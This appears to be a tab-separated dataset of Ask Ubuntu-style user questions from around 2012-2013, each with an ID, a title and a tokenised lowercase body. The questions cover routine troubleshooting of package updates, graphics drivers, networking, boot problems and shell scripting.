241978	problem with updating due to obsolete package versions .	i recently installed ubuntu 12.04 . when i started the update manager i received this message : the problem can not be reported : you have some obsolete package versions installed . please upgrade the following packages and check if the problem still occurs : jockey-common , busybox-initramfs , coreutils , dbus , initscripts , libapt-inst1.4 , libapt-pkg4.12 , libc-bin , libc6 , libdbus-1-3 , libexpat1 , libgcrypt11 , libglib2.0-0 , libgnutls26 , libgssapi-krb5-2 , libk5crypto3 , libkrb5-3 , libkrb5support0 , libldap-2.4-2 , libpolkit-agent-1-0 , libpolkit-backend-1-0 , libpolkit-gobject-1-0 , libsasl2-2 , libsqlite3-0 , libssl1.0.0 , libtasn1-3 , libudev0 , libxcb1 , lsb-base , mountall , multiarch-support , openssl , passwd , perl-base , policykit-1 , python2.7 , python2.7-minimal , sysv-rc , sysvinit-utils , tzdata , udev , upstart does anyone know how to fix this problem ? thank you . david
241980	where is '/etc/hosts ' in xampp 1.7.7 ?	i want to make a virtual host using xampp 1.7.7 under ubuntu 12.04 , i followed an instruction to add a line of virtual hostname in /opt/lampp/etc/hosts . but when i search the file , the file does not exists . when i create a new one , it 's still not working . is virtual hosts configuration has changed in some latest xampp versions ?
241981	how to set up smtp ?	i want to send mail from a local server . i tried to install sudo apt-get install postfix but it showed this error failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/p/postfix/postfix please help me to enable smtp in ubuntu .
241983	problem sharing mysql data on dual boot machine	first of all let me say that this is a question following my attempt to do the solution on this post can i share mysql database files with windows on dual boot ? . i was hit by an error and need help solving it . i posted this as an `` answer '' there and was advised to open a new question : so , here is my problem . i 'm running kubuntu 12.04 , and windows 7 ultimate . my mysqldata folder right now rest on a second hardrive , which is my data drive shared between both installs this is the line for it on my fstab : uuid=9eead9baead98f41 /media/data ntfs-3g defaults , windows_names , locale=en_us.utf8 0 0 i tried adding uid=mysql , gid=mysql to the options line . a ls -la /media/data shows that it indeed was mounted for the correct users and also the permissions were 777 . same goes for the /media/data/sistemas/mysqldata folder . the first errors i 'm getting , in all of the cases are : /usr/bin/mysqladmin : connect to server at 'localhost ' failed error : 'ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) ' check that mysqld is running and that the socket : '/var/run/mysqld/mysqld.sock ' exists ! 130114 2:09:08 [ warning ] ca n't create test file /media/data/sistemas/mysqldata/verditius.lower-test 130114 2:09:08 [ warning ] ca n't create test file /media/data/sistemas/mysqldata/verditius.lower-test /usr/sbin/mysqld : ca n't find file : './mysql/plugin.frm ' ( errno : 13 ) 130114 2:09:08 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 130114 2:09:08 innodb : operating system error number 13 in a file operation . innodb : the error means mysqld does not have the access rights to innodb : the directory . so , what can i do to solve this ? here is the bit on mysql.cnf which i think is important : user = mysql pid-file = /var/run/mysqld/mysqld.pid socket = /var/run/mysqld/mysqld.sock port = 3306 basedir = /usr datadir = /media/data/sistemas/mysqldata tmpdir = /tmp lc-messages-dir = /usr/share/mysql
241991	ubuntu software center not showing installed applications	ubuntu software center not showing installed applications after an auto-system update . only a white screen shows up . also , applications which were installed before the update are not showing as installed in software center . please , help . thanks prizzly
241993	graphics driver problem for gtx660 ti	in the `` additional drivers '' section of software sources it says there is no proprietary drivers in use . i ca n't seem to find another way to install them , other than downloading them directly from nvidia and installing them myself ( which always breaks my system , forcing me to reinstall ) . i ca n't even seem to find the nouveau driver though . i did n't have this problem with my gtx570 . i am looking for drivers since there is stutter going on in the desktop animations and steam `` big picture '' mode results in just a black screen . i am running ubuntu 12.10 with the latest version of gnome + gdm login screen ( this was also an issue with unity , however ) . my graphics card is an evga gtx660 ti ftw+ ( 3 gb ram ) plugged into an asrock z77 pro 3 motherboard . edit : i used the command : sudo apt-get install nvidia-current nvidia-settings now i have nvidia x-server as an app in my list , but still saying i 'm not running any proprietary drivers . also , i have two monitors , and when i set it to `` mirror displays '' it dropped my resolution to 1024x768 ( 4:3 ) and would n't let me restore to my previous setting . now i 'm stuck with this annoying aspect ratio ... ( before i ticked `` mirror displays '' the resolution box already said 1024x768 ( 4:3 ) but it looked more like 1920x1080 ( 16:9 ) ) . edit 2 : after a complete system lockup and reboot via reset button , ubuntu wo n't even boot anymore . it just hangs at a purple screen that usually comes up just before login . this issue has forced me to reinstall several times in the last couple of days . its possible if i keep rebooting it will work again although this only worked once . this is the first reboot since the resolution changed .
241997	http/1.1 504 connection refused	i have a problem with internet in terminal , ubuntu 12.10 . i try to download a file by axel but i got an error : http/1.1 504 connect to [ url ] :80 failed : connection refused it 's happen after i remove tor , how can i fix this ?
241998	pxe boot broken after 12.04 upgrade	i had a system booting over the network with pxe on 11.10 . i upgrade to 12.04 and now the boot fails during startup with the following messsage : gave up waiting for root device . common problems : -boot args ( cat /proc/cmdline ) -check rootdelay= ( did the system wait long enough ? ) -check root= ( did the system wait for the right device ? ) -missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/nfs does not exist . dropping to a shell ! my pxe config file is : default linux say starting legolas label linux kernel legolas/vmlinuz append netboot=nfs root=/dev/nfs initrd=legolas/initrd.img nfsroot=192.168.0.8 : /srv/tftp/legolas , rsize=4096 , wsize=4096 ip=dhcp pci=nomsi rw quiet any ideas why this does not work on 12.04 ? thanks .
241999	tilt of laptop causing `` unknown key pressed '' syslog entries	while trying to figure out another crash on a new hp probook 4340s , ubuntu 12.04 , i noticed my syslog was getting continuously spammed by this : jan 14 06:50:02 localhost kernel : [ 1070.536686 ] atkbd serio0 : unknown key pressed ( translated set 2 , code 0xa7 on isa0060/serio0 ) . jan 14 06:50:02 localhost kernel : [ 1070.536693 ] atkbd serio0 : use 'setkeycodes e027 < keycode > ' to make it known . this was happening every second or so and one of those things that once you know it , drives you nuts : | i hunted around and tried : a power reset trick suggested in another thread ( apparently it can be some battery or power event ) ; removing the wireless keyboard i 'm using ; disabling all kinds of stuff in the bios ( fingerprint reader , wireless switch etc ) but they still continued . then unplugged everything and took my laptop to another room to continue tinkering ... and it stopped . after some trial and error , it seems to be down to the very specific angle of the stand that it sits on on my desk . it stops when flat , and stops when at a steeper angle . even just raising it a few degrees reduces the frequency to , say , every 15 seconds . i thought some flex in the case may be spuriously firing another key , but it does n't register in xev , and all the other hotkeys seem to work as expected . does anyone have any idea what kind of sensor/hardware could cause this event ? afaik the machine does n't have a tilt sensor or anything ... failing that - can i somehow ignore this scancode so it does n't keep filling my log ?
242001	how to set z-index for gnome-terminal ?	is it possible to control the z-index of a new gnome-terminal window ? i want to open a new terminal with a script , but rather than showing it as a popup , i want to make it as the first available selection on alt-tab switching .
242002	how to fix the computer after forced shutdown while running wubi.exe ?	how do i fix the computer after a forced shutdown while running wubi.exe ? i was trying to download ubuntu via wubi.exe , but the screensaver came on and the mouse and the keyboard did n't work . so , i turned my laptop off without any thinking by mistake . then , my computer says that it ca n't find a operating system , so it would n't turn on . how do i restore it to windows xp ?
242006	can anyone recommend a good chroot ssh tutorial/ how to for ubuntu 12.04 lts	i 'm looking for a good how-to/tutorial on setting up a chrooted ssh environment on ubuntu 12.04lts . i 'm not interested in chrooted sftp which is easy to implement . it 's jailing users in their home directory when they log in via ssh that i 'm primarily interested in . grateful for any help , thanks
243015	better file copying ?	on my windows machine i have a few utilities which makes it easy to copy/move large numbers of files from and to different directories , teracopy is the one i use most . i can not do the same on my ( k ) ubuntu boxes because all file io operations execute at the same time and there 's no native way to queue files ; see a list of files currently lined up for moving/coping ; pause , resume , stop individual files etc . is there a better file copy/move utility for ( k ) ubuntu ?
243020	ubuntu ca n't recognse my wifi	i know this is a common question , i 've search and tried many solutions already . the thing is when i tried ubuntu with live cd , i can use my wifi although i needed to go to software source to enable a setting . but after i actually installed ubuntu it does n't work anymore . i ca n't even enable that setting . this goes without saying that i 'm a noob . thanks .
243023	ca n't login , authentification failure	i can not login at all , i get authentification failed when i type in my usual password and there are no other options to get into the system . can i do something from boot , if so how ?
243034	how can i specify the hour at which my daily schedule of the dejavu backup tool should run ?	how can i specify the hour at which my daily schedule of the dejavu backup tool should run ?
243035	how to choose lvm mapping mode when installing ubuntu server 12.04 ?	i would like to create a volume group with striped mode on top of 2 raid-1 devices . the issue here is i can not choose striped when configuring lvm at installation stage . it 's always be linear .
243037	ubuntu hanging at boot screen	i had ubuntu 12.04 working fine with my laptop . later i upgraded to 12.10 . it was working fine for some time . then i installed some packages to make my mts device work . this made ubuntu crash . later i tried to reinstall ubuntu 12.10 . but i am not able to boot even from usb stick now . when ever i go to boot menu and select the option to boot from usb stick , i see the a purple screen with the shifting dots patron ( loading ) . then it hangs and nothing works ( dots do n't shift any more ) . the same boot able usb sticks works fine in my friend 's laptop . i went to recovery mode and then updated grub . but no use : - ( . i tried to install older versions of ubuntu also . but no use .
243041	what is pxgsettings ?	today i opened system monitor to kill an app and found three enigmatic entries labelled pxgsettings and four sh entries . see image below : does anyone have a clue what these are ? edit today ( 2 days later ) i see there is one more pxgsettings entry and one more sh entry . in system log i found this line : dbus [ 896 ] : [ system ] rejected send message , 3 matched rules ; type= '' error '' , sender= '' :1.57 '' ( uid=1000 pid=2013 comm= '' bluetooth-applet `` ) interface= '' ( unset ) '' member= '' ( unset ) '' error name= '' org.freedesktop.dbus.error.unknownmethod '' requested_reply= '' 0 '' destination= '' :1.2 '' ( uid=0 pid=919 comm= '' /usr/sbin/bluetoothd `` ) but my bluetooth is disabled and i never tried to send anything through bluetooth . is this a bug ? has my computer been compromised ? this is the output of top : now that i 'm using ubuntu raring the new version of system monitor gives more clues . see the following screenshots : so it seems these processes are unity related . should i worry ?
243043	after logging in , there 's a black screen and my cursor , nothing else ! in ubuntu 12.10	i 've been using ubuntu ( 12.10 ) for a long time , and recently , my ubuntu went through yet another update . the whole update prompt showed up , following by a password prompt , and finally the good ol ' progress bar ... everything went well , and later on , i shut down my computer . the next day , i turned my pc on , went to the login screen . i went ahead , and logged in , but after that , all i could see was a black screen , and my cursor ! i checked the forums , and got various tips , none of which worked ... now i 'm stuck with an ubuntu installation that 's completely useless . one more thing : i even tried logging in through guest , but same problem ! : \ my computer specs : motherboard : intel dg41wv processor : intel core 2 quad q6600 @ 2.40ghz graphics : intel g41 express chipset ram : dual channel , ddr3 2*2gb ( 4096 mbytes ) hdd : seagate 500gb sata ( sorry , ca n't get more on this ) -- -- detailed info -- -- to be a little more precise about my problem , after i log in , i can see a black screen and my cursor . plus , importantly , i was able to see a login screen , hence i 'm sure ubuntu is rendering properly , and also pretty sure that there 's no problem with the drivers ( otherwise i should n't even get a login screen , right ? ) . anywho , another ( probably ) important thing is that , after logging in , i can hit < 1 > and get up a recovery console . the only thing that does n't load is my actual gui desktop then , i ran unity from the recovery console , it went through a few commands , got stuck at opengl for a few seconds , then zoomed throught many more lines of code , and ended up with this : error 2012-01-03 20.51.23 unity.launcher.icon trashlaunchericon.cpp:62 could not create file monitor for trash url : operation not supported * glibc detected compiz : malloc ( ) : memory corruption : 0x09c861d6 ** after that . back at < 7 > : desktop background + cursor so back to the terminal again , i had to hit ctrl+c to get back again , now , i typed unity again , and this was the output : warning : no display variable set , setting it to : d compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service : no process found so now i did a `` sudo service lightdm restart '' : x10 : fatal io error 4 ( interrupted system call ) on x server `` :0 '' after 131 requests ( 130 known processed ) with 0 events remaining . lightdm stop/waiting lightdm start/running , process 2852 im back at the login screen , and i login again , now im back to black screen ( yes , i lost the desktop background as well ) so , once again , i try unity ( same response as last time ) : warning : no display variable set , setting it to : d compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service : no process found and still a black screen ! : \
243044	why is n't rc.local executed ?	i am pxe booting some ubuntu machines in a cluster . all of a sudden my rc.local script has stopped working . i 've check the permission of /etc/rc.local : -rwxr-xr-x 1 root root 1087 jan 14 11:04 /etc/rc.local i 've checked that rc.local is symlinked in the following folders : /etc/rc2.d /etc/rc3.d /etc/rc4.d /etc/rc5.d they all symlink to /etc/init.d/rc.local . i 've tried to output echo lines from the script to /tmp/test.out but no luck . when i execute the rc.local script after the machines has booted , it works fine . what can cause rc.local not to run ?
243047	awesome multimonitor scenario : how to stop mirroring ?	i have this two-monitor configuration that works flawlessly in the default 12.10 gnome wm . this is my xorg.conf : section `` monitor '' identifier `` vga0 '' option `` enable '' `` true '' modeline `` 1920x1200_60.00 '' 193.16 1920 2048 2256 2592 1200 1201 1204 1242 -hsync +vsync option `` preferredmode '' `` 1920x1200_60.00 '' endsection section `` monitor '' identifier `` lvds0 '' option `` enable '' `` true '' modeline `` 1368x768_60.00 '' 85.86 1368 1440 1584 1800 768 769 772 795 -hsync +vsync option `` prefferedmode '' `` 1368x768_60.00 '' endsection section `` device '' identifier `` radeon0 '' driver `` radeon '' screen 0 endsection section `` device '' identifier `` radeon1 '' driver `` radeon '' screen 1 endsection section `` screen '' identifier `` big screen '' device `` radeon0 '' monitor `` vga0 '' defaultdepth 24 subsection `` display '' depth 24 modes `` 1920x1200 '' endsubsection endsection section `` screen '' identifier `` little screen '' device `` radeon1 '' monitor `` lvds0 '' defaultdepth 24 subsection `` display '' depth 24 modes `` 1368x768 '' endsubsection endsection section `` serverlayout '' identifier `` my layout '' screen 0 `` big screen '' screen 1 `` little screen '' rightof `` big screen '' option `` xinerama '' `` true '' endsection however , awesome wm that i am trying to set up right now is simply mirroring upper left part of the bigger screen to the smaller screen . although i am happy that the resolution is right , i would obviously like to fill each screen with different content . what am i doing wrong ?
243049	trouble authorizing everpad on lubuntu ?	due to heating issues i switched to a lighter version of ubuntu i.e lubuntu 12.10 from ubuntu 12.04 . i was using everpad in ubuntu 12.04 without problems , but ca n't get it going on lubuntu 12.10 . the issue is that after i authorize i am thrown back to everpad settings/management console and instead of de-authorize i see authorize in the authorization section of software . i 've tried to re-install the s/w and tried deleting the .everpad directory in my home directory but it does n't help . i installed the software following the instructions in everpad 2.0 released with new features
243053	why does n't ubuntu one sync sub-folders ?	i am using ubuntu 12.04 and ubuntu-one to sync my folders . i am experiencing this problem for a while now and its very annoying . a folder within a folder is not synced ! example : '' folder 1 '' - > synced fine now i add `` folder 2 '' into this folder , but ubuntu one does not sync it . so i have to select with right and add it to ubuntu one `` manually '' ... so instead of having : /folder1/ /folderx/ i get in my ubuntu one account : folder1/ folder1/folder1.2 folder1/folder1.3 folder1/folder1.4 folderx folderx/folderx.1 ... any ideas ? how do i fix this issue ?
243058	why does n't the second `` wired connection '' show up when usb-tethering with my android phone ?	i know how to tether via usb using android to my ubuntu 10.04 and this how to tether android smartphone to ubuntu linux how-to is what i have been doing for the last couple of months ( running fine ) . the issue now is that the `` wired connection '' appearing does not appear anymore and it seems that the static ip assigned to my other interface ( eth0 ) are being assigned to it somehow . these settings are obviously not suitable in tethering and therefore my tethered connection is n't working . this behaviour changed for me recently , and i seem unable to figure out why . on my other pc ( same os ) i do see another `` wired connection '' and tethering works fine on that one . how to troubleshoot and fix this ? before tethering : abc @ xyz : ~/downloads $ ifconfig eth0 link encap : ethernet hwaddr e8:03:9a:65:08:7e inet addr:117.129.59.85 bcast:117.129.59.255 mask:255.255.255.0 inet6 addr : fe80 : :ea03:9aff : fe65:87e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:15420730 errors:0 dropped:0 overruns:0 frame:0 tx packets:3969133 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4037041565 ( 4.0 gb ) tx bytes:1397544101 ( 1.3 gb ) interrupt:43 base address:0x6000 ham0 link encap : ethernet hwaddr 7a:79:00:00:00:00 inet6 addr : fe80 : :7879 : ff : fe00:0/64 scope : link up broadcast running multicast mtu:1404 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 rx bytes:0 ( 0.0 b ) tx bytes:468 ( 468.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:110235 errors:0 dropped:0 overruns:0 frame:0 tx packets:110235 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:235513662 ( 235.5 mb ) tx bytes:235513662 ( 235.5 mb ) vboxnet0 link encap : ethernet hwaddr 0a:00:27:00:00:00 inet addr:192.168.56.1 bcast:192.168.56.255 mask:255.255.255.0 inet6 addr : fe80 : :800:27ff : fe00:0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:618 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:128782 ( 128.7 kb ) after tethering ( note the eth0 and usb0 entries ) : abc @ xyz : ~/downloads $ ifconfig eth0 link encap : ethernet hwaddr e8:03:9a:65:08:7e inet addr:117.129.59.85 bcast:117.129.59.255 mask:255.255.255.0 inet6 addr : fe80 : :ea03:9aff : fe65:87e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:15423208 errors:0 dropped:0 overruns:0 frame:0 tx packets:3970469 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4037536312 ( 4.0 gb ) tx bytes:1398652503 ( 1.3 gb ) interrupt:43 base address:0x6000** ham0 link encap : ethernet hwaddr 7a:79:00:00:00:00 inet6 addr : fe80 : :7879 : ff : fe00:0/64 scope : link up broadcast running multicast mtu:1404 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 rx bytes:0 ( 0.0 b ) tx bytes:468 ( 468.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:110235 errors:0 dropped:0 overruns:0 frame:0 tx packets:110235 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:235513662 ( 235.5 mb ) tx bytes:235513662 ( 235.5 mb ) usb0 link encap : ethernet hwaddr 82:43:72:0b : d0:6f inet addr:117.129.59.85 bcast:117.129.59.255 mask:255.255.255.0 inet6 addr : fe80 : :8043:72ff : fe0b : d06f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3 errors:0 dropped:0 overruns:0 frame:0 tx packets:20 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:196 ( 196.0 b ) tx bytes:5552 ( 5.5 kb ) ** vboxnet0 link encap : ethernet hwaddr 0a:00:27:00:00:00 inet addr:192.168.56.1 bcast:192.168.56.255 mask:255.255.255.0 inet6 addr : fe80 : :800:27ff : fe00:0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:618 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:128782 ( 128.7 kb )
243061	i have a dual boot of windows 7 and ubuntu 12.10 on my laptop . i see a grub rescue error during start . can anyone please help me fix this ?	i have a laptop with dual boot of windows 7 and ubuntu 12.10 . after installation everything was fine and working properly but after a shutdown and reboot i 'm seeing the grub rescue error . please help me to fix this . i installed ubuntu by downloading the software from canonical and using usb booting !
243065	ca n't change libreoffice spell-check language	my system language is german but my text in libreoffice writer gets all underlined because the spell chechking language is set to english usa . neither can i change it to german there which is also listed nor can i change it via extras -- > language -- > all text . i 've found this : http : //ask.libreoffice.org/en/question/1678/spell-checking-not-working-in-v342/ i deleted two folders named `` bundled '' and restarted libreoffice but the problem persists . no new folders called bundled created by the way . i 've also installed a german dictionary via extensions which did n't help . i 'm on 12.04 , system is up to date .
243071	generating wpa/wpa2 key in linux bash ?	how can i generate a new random wpa/wap2 key in the linux terminal ? i tried pwgen but this is not generating hexadecimal values .
243073	sluggish desktop/unity performance on thinkpad edge	fresh ( 1 week old ) install of ubuntu 12.10 64 bit version on a thinkpad edge 15 , specs as follows : system specs ( site would n't let me hotlink the image ) i think the swap is about 2gb but ca n't remember how to check . problems encountered : general slow desktop performance ; switching tabs in chrome can take 5-10 seconds , windows frequently stop responding , fading to a translucent grey before coming back to life super button takes 2-3 seconds to load dash on fresh boot , but with basic programs ( chrome , thunderbird ) open after a few minutes then takes up to 1:30 to open up . trying to restart the system , closing about half of the open programs crashed them loading the system driver update window caused a crazy bug where the every time i switched back to the system settings window it would try to open whatever icon was selected again , like the return keypress event was repeating . staying in any one program for a while tends to improve that program ; staying in chrome tab switching now takes under 1s , but switching away and back causes slowness . opening system monitor seems to show compiz taking ~25 % cpu usage even when not much stuff is going on . sadly we have a dead/alive cat situation too , as system monitor also seems to sit at 15-20 % cpu usage when monitoring anything else . as an additional point , taking measurements just now showed thunderbird at a ridiculous 565mb memory usage ; previously it only ever hovered at about 200mb . maybe not the problem , but may be related . in case it helps anyone , here 's my xorg.0.log file . there 's some mention of the graphics card right near the bottom .
243074	installing ubuntu partitions problem	i 'm an ubuntu newbie and i 'm using it for the first time . during the installation i chose install ubuntu over windows , thinking that this will keep the partitions and install ubuntu on the partition where the windows was installed ( c : ) and keep the other one ( d : ) with all the files on it . after i installed i could n't find the d : \ partition . was it formatted as well , and if yes is there some way to retrieve it ? please help i 'm desperate , i had some really important files on that partition !
243076	usb ethernet adapter : 'cable unplugged ' message while plugged in	i have an acer travelmate c110 with ubuntu 11.10 . there 's a built in network card , when i connect the cable to it everything works fine ( mail , internet , ... ) . i now bought a usb ethernet adapter . ( it works perfect with win7 ( had to install a driver ) ) . for ubuntu : ubuntu installed the driver for it ( dm9601 ) - i can check it with lsmod . i also have a eth1 when i check with ifconfig . there are two 'wired connections ' in the network connections dialog box . 'wired connection 2 ' is the eth1 . all settings are the same for both connections in this dialog box . so everything seems ok yet no internet . when i check through system settings > network , i have 2 wired symbols both say 'cable unplugged ' . yet when i put the cable in the built in network card of the laptop : internet works . if i switch the cable to the usb ethernet adapter , ubuntu remains telling the cable is unplugged for that adapter - even if its the same cable . if i switch the cable with adapter to win7 : everything works . to conclude : - i see no obvious hardware problem - driver dm9601 installed - a second connection show up on differents places ( ifconfig , network dialog box , network connections dialog box ) : so that seems to be ok also . - network dialog box says : 'cable unplugged ' while its plugged in thanks for any suggestions !
243077	add white dots to login screen	some people may not like the white dots on login screen of ubuntu 12.10 , but i really love it , is there any way to add these dots desktop also and is there any way to remove these from the desktop ( after addition of the dots in desktop ) ? ?
243084	install usb iburst driver	i am struggling to install my iburst usb modem so i can access the internet .
243086	how to iterate through subdirectories with same name in a path ?	i am trying to write a bash script that is iterating through sub directories where parts of the path are identical . maybe best is to show an example : directories : /path/same/ /path2/same/ /path3/same/ then i want to `` do something '' to all files contained in those directories and save them in another of those sub directories . results : /path/another/ /path2/another/ /path3/another/ i guess it has to be done with some kind of for i in /*/same/* ; do ... do something with $ i ... done loop , but somehow all i try ends up not returning anything in $ i . any tips ? thanks : )
243088	how do i get rid of old ubuntu installation in grub ?	noob question here . my laptop is dual booted with windows in one partition and ubuntu 12.04 in another . i recently wanted to do a fresh install of ubuntu , so what i did was pop in a ubuntu installation disk and reformatted . on the part where i partition the drive , i deleted the old partition where old ubuntu was installed and replaced it with a new partition where the new ubuntu should be placed . i did n't touch windows . i assumed it will just replace the old one , but it did n't . when i boot , i see ubuntu ( the newly installed one ) , windows , and ubuntu ( the old one i have ) . how do i get rid of the old one ? i tried to boot to the old one and i 'm surprised that i can still boot to it . how is it possible that i can still boot to it and how much is it using on my drive ? d : please tell me how to get rid of it . disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000325dd device boot start end blocks id system /dev/sda1 * 1 13055 104857600 7 hpfs/ntfs /dev/sda2 13055 30402 139338753 5 extended /dev/sda5 13055 22641 76998656 83 linux /dev/sda6 22641 23014 2998272 82 linux swap / solaris /dev/sda7 23014 30402 59339776 83 linux model : ata samsung hm250ji ( scsi ) disk /dev/sda : 250gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 107gb 107gb primary ntfs boot 2 107gb 250gb 143gb extended 5 107gb 186gb 78.8gb logical ext4 6 186gb 189gb 3070mb logical linux-swap ( v1 ) 7 189gb 250gb 60.8gb logical ext4 /dev/sda7 on / type ext4 ( rw , errors=remount-ro , commit=600 ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/dvorak/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=dvorak ) /dev/sda5 on /media/299279fa-1533-4471-964a-f820df7e1c54 type ext4 ( rw , nosuid , nodev , uhelper=udisks ) filesystem size used avail use % mounted on /dev/sda7 56g 2.7g 51g 6 % / none 928m 260k 928m 1 % /dev none 934m 340k 933m 1 % /dev/shm none 934m 96k 933m 1 % /var/run none 934m 0 934m 0 % /var/lock /dev/sda5 66g 2.4g 60g 4 % /media/299279fa-1533-4471-964a-f820df7e1c54
243090	graphics problem on ubuntu 12.10 gnome 3	i 've been using 12.10 for about two weeks now with no problems . the whole time i have been using gnome 3 . then suddenly the system spontaneously rebooted . when it came back up there were lots of obvious , seemingly random graphics bugs . here 's a screenshot : . what your seeing is just an empty workspace with one of the stock wallpapers right after log in . changing the background several times will cause it to randomly display correctly/incorrectly . the graphics get borked on individual windows from time to time . i have n't been able to reproduce this with classic gnome or unity , but this happens every time with gnome 3 . i really like gnome 3 and would like to keep using it , but for now i 'm stuck with unity . here 's some more info about my system : model : dell precision m4600 memory : 7.8 gib processor : intel® core™ i7-2640m cpu @ 2.80ghz × 4 graphics : gallium 0.4 on amd turks os type : 64-bit
243093	unable to install ia32-libs	i can not install ia32-libs , and some other libs , neither with apt-get nor with aptitude . i have ubuntu 12.10 . [ root : /etc/apt ] # cat /etc/apt/sources.list deb http : //us.archive.ubuntu.com/ubuntu/ quantal main restricted universe multiverse deb http : //us.archive.ubuntu.com/ubuntu/ quantal-security main restricted universe multiverse deb http : //us.archive.ubuntu.com/ubuntu/ quantal-updates main restricted universe multiverse deb http : //us.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse note : same problem without backports . [ root : /etc/apt ] # apt-get update ... [ root : /etc/apt ] # apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch but it is not installable e : unable to correct problems , you have held broken packages . [ root : /etc/apt ] 100 # apt-get install ia32-libs-multiarch reading package lists ... done building dependency tree reading state information ... done package ia32-libs-multiarch is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'ia32-libs-multiarch ' has no installation candidate
243098	is it possible to integrate unity within lubuntu desktop environment ?	is it possible to integrate unity dash in lubuntu ( fresh clean install ) apart from installing ubuntu-desktop . if installing ubuntu-desktop is the only option then if installed are there any chances of it breaking the graphic drivers packaging in my system ?
243105	( nautilus scripts ) $ nautilus_script_selected_file_paths ; have problems with space	so the script is : # ! /bin/bash for line in $ nautilus_script_selected_file_paths ; do if [ [ `` $ line '' = `` '' || `` $ line '' = `` `` ] ] ; then exit else unzip `` $ line '' -d `` temp '' fi done it works well and unzips the file . but if the file is named with a space ( eg : leon - 1994.zip ) it will not work and the $ line will be 1st time : /home/citybong/downloads/leon 2nd time : - 3rd time : 1994.zip edit : i fount a link http : //g-scripts.sourceforge.net/faq.php for the question : `` my script ca n't handle multiple files/files with spaces '' but i am kinda newbie to bash scripting and i ca n't understand their solutions
243111	ubuntu 12.10 has error logging in ; only displays cursor and wallpaper	i am running ubuntu 12.10 on a dell dimension 3000 desktop computer . i removed all partitions from the hard drive before installation , installation was flawless , but when i log in , i only see the desktop background and the normal pointing cursor ( does not indicate loading , etc. ) . the first time i noticed this , a few error messages would appear saying that some program had closed unexpectedly ( the first one said compiz had closed and asked if i would like to keep it remain closed or relaunch ) . after pressing the console power button one time , it prompted me to shut down , log out , or hibernate , etc . after restarting , it does the same thing , although i do not see any error messages . i have been able to boot lubuntu 's lxde on the same computer in the past , so a roadblock of this error was not entirely anticipated .
243115	issues with url open	i have problem with opening urls . sample : i open hexchat . i click on any url . url opens chrome new window , but only new tab , no selected url . this problem does n't exist when i set firefox/opera as default browser . also , mailto links works , they opens in thunderbird . before this problem , i changed google chrome 's settings in alacarte . i added -- enable-webgl ( i need webgl for some games , web lab and webgl experiments ) at end of line called command in alacarte ( in ubuntu alacarte is called main menu ) . webgl in chrome works , but xdg-open http : //url.tld does n't . i reverted chrome settings in alacarte to default . but nothing . same problem . update : i tried to fix that with dconf-editor . no changes . problem is same . thanks in advance .
